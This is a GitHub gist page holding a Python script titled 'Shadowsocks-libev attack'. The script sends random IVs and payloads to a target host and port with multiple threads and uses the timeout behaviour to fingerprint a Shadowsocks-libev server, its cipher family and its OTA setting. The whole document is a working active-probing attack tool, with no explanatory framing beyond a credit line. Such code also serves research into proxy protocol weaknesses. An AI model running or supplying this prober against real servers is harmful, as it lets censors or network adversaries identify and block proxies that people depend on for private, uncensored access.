Skip to content

Instantly share code, notes, and snippets.

@jimages
Created July 20, 2017 08:07
Show Gist options
  • Save jimages/c1d3f7a8b2e31fa65728056ff9b2d4e1 to your computer and use it in GitHub Desktop.
Save jimages/c1d3f7a8b2e31fa65728056ff9b2d4e1 to your computer and use it in GitHub Desktop.
Shadowsocks-libev attack
#!/usr/bin/env python
#-*- coding: utf-8 -*-
'''
Copyleft (c) 2016 breakwa11
https://github.com/breakwa11/shadowsocks-rss
'''
import logging
import socket
import time
import traceback
import os
import struct
import threading
import binascii
scan_first_try = 8
scan_max_try = 64
max_thread_num = 16
def compat_ord(s):
if type(s) == int:
return s
return _ord(s)
def compat_chr(d):
if bytes == str:
return _chr(d)
return bytes([d])
_ord = ord
_chr = chr
ord = compat_ord
chr = compat_chr
def to_bytes(s):
if bytes != str:
if type(s) == str:
return s.encode('utf-8')
return s
def to_str(s):
if bytes != str:
if type(s) == bytes:
return s.decode('utf-8')
return s
def random_string(length):
return os.urandom(length)
def test_single(iv, ip, port, addrtype, attack_data_list, connect_timeout = 5, timeout = 2):
try:
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP)
af, socktype, proto, canonname, sa = addrs[0]
s = socket.socket(af, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
s.settimeout(connect_timeout)
s.connect(sa)
s.send(iv)
ok = 0
index = 0
s.settimeout(timeout)
while ok == index and index < len(attack_data_list):
s.send(attack_data_list[index])
index += 1
try:
ret = s.recv(1024)
except socket.timeout:
ok += 1
continue
except:
pass
break
return ok
except:
pass
class TestThread(threading.Thread):
def __init__(self, lock, semaphore, index, attack_ok_list, params):
threading.Thread.__init__(self)
self.lock = lock
self.semaphore = semaphore
self.index = index
self.params = params
self.attack_ok_list = attack_ok_list
semaphore.acquire()
def run(self):
for retry in range(3):
ok = test_single(*self.params)
if ok is None:
continue
if ok:
self.lock.acquire()
self.attack_ok_list.append([self.index, ok, self.params[0], self.params[3], self.params[4]])
self.lock.release()
break
self.semaphore.release()
def scan(addr, port):
attack_ok_list = []
addrtype = 0
attack_fail = False
ota = False
lock = threading.Lock()
semaphore = threading.Semaphore(max_thread_num)
for index in range(scan_first_try):
attack_data_list = []
attack_data_list.append(random_string(2))
attack_data_list.append(random_string(1))
attack_data_list.append(random_string(4))
attack_data_list.append(random_string(4))
iv = random_string(8)
testThread = TestThread(lock, semaphore, index, attack_ok_list, (iv, addr, port, addrtype, attack_data_list))
testThread.start()
print("Waiting response")
for thread_num in range(max_thread_num):
semaphore.acquire()
print("attack size %d" % (len(attack_ok_list),))
if len(attack_ok_list) == 0:
return False
min_index = 10
for attack_item in attack_ok_list:
if attack_item[1] < min_index:
min_index = attack_item[1]
print("min_index %d" % (min_index,))
if min_index == 4:
ota = True
attack_ok_list = []
semaphore = threading.Semaphore(max_thread_num)
for index in range(scan_first_try):
attack_data_list = []
attack_data_list.append(random_string(12))
attack_data_list.append(random_string(1))
attack_data_list.append(random_string(4))
attack_data_list.append(random_string(4))
iv = random_string(8)
testThread = TestThread(lock, semaphore, index, attack_ok_list, (iv, addr, port, addrtype, attack_data_list))
testThread.start()
print("Waiting response")
for thread_num in range(max_thread_num):
semaphore.acquire()
print("attack size %d" % (len(attack_ok_list),))
if len(attack_ok_list) == 0:
return False
min_index = 10
for attack_item in attack_ok_list:
if attack_item[1] < min_index:
min_index = attack_item[1]
print("OTA min_index %d" % (min_index,))
if min_index == 4:
return False
iv_size = 4 + min_index * 4
encryptor_info = {}
encryptor_info[16] = 'rc4-md5/aes'
encryptor_info[8] = 'chacha20/salsa20'
encryptor_info[12] = 'chacha20-ietf'
for attack_item in attack_ok_list:
if attack_item[1] == min_index:
iv = attack_item[2]
att_data = b''.join(attack_item[4])
ok = test_single(iv, addr, port, 0, [att_data[:iv_size - len(iv) + 2]])
if ok == 0:
print("%s:%d is a Shadowsocks-libev server with %s encryptor, OTA = %s" % (addr, port, encryptor_info[iv_size], ota))
return True
return False
def main(addr, port):
if scan(addr, port):
return
print("%s:%d is an unknown server" % (addr, port))
if __name__ == '__main__':
addr = "127.0.0.1" # set the server ip or hostname
port = 8988 # set the server port
main(addr, port)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment